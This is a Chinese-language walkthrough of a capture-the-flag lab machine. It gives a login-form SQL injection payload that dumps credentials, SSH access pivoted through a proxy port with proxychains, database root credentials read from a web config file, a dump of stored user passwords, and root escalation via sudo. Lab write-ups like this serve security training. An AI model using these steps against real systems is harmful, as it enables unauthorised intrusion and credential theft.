靶机设置
点击注册,将靶机资源加入进入,点击启动
将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址
将kali也设置为桥接模式,记得勾选复制物理网络连接状态
设置虚拟网络编辑器,更改桥接模式
靶机IP发现
输入netdiscover -i eth1 -r 192.168.56.0/24 查找,发现靶机MAC地址
靶机ip为192.168.56.103
扫描端口
namp 192.168.56.103
访问浏览器
发现80端口开放,访问浏览器页面
发现后台登陆页面
测试SQL注入
在登录框随便输入账号密码,BP进行抓包,放到Repeater
尝试构造sql注入,发现有报错回显,说明存在sql注入
加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码
账号:john
密码:hereisjohn
登陆页面
因为账号密码回显页面显示via SSH字段,大概率是使用ssh登陆
但还是先尝试一下web页面登录
果然不行,使用ssh登陆
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。可能是需要代理3128端口才能连接22端口
配置代理端口
在kali中安装proxychains服务
apt install proxychains
更改代理文件
vim /etc/proxychains.conf(必须在root用户权限下运行)
在下方增加http 192.168.56.103 3128
进行连接proxychains ssh john@192.168.56.103 -t "/bin/sh"
发现连接失败
vim /etc/proxychains.conf
将strict_chain注释掉
将random_chain取消注释
同理,vim /etc/proxychains4.conf 也一样
再次连接,发现连接成功
提权
发现为普通用户
查看sudo -l发现没用免密操作
因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php
果然显示出了账号密码
账号:root
密码:root
连接数据库
mysql -uroot -proot
连接成功
show databases;
查看数据库库名
use SkyTech;
show tables;
查看SkyTech中的表名
select * from login;
发现三组账号密码
john@skytech.com
hereisjohn
sara@skytech.com
ihatethisjob
william@skytech.com
senseable
william用户登录失败,尝试sara用户
sara用户登录成功
发现也是普通用户,继续提权
sudo -l发现存在免密操作
发现root用户的密码为theskytower
su root进行登陆
提权成功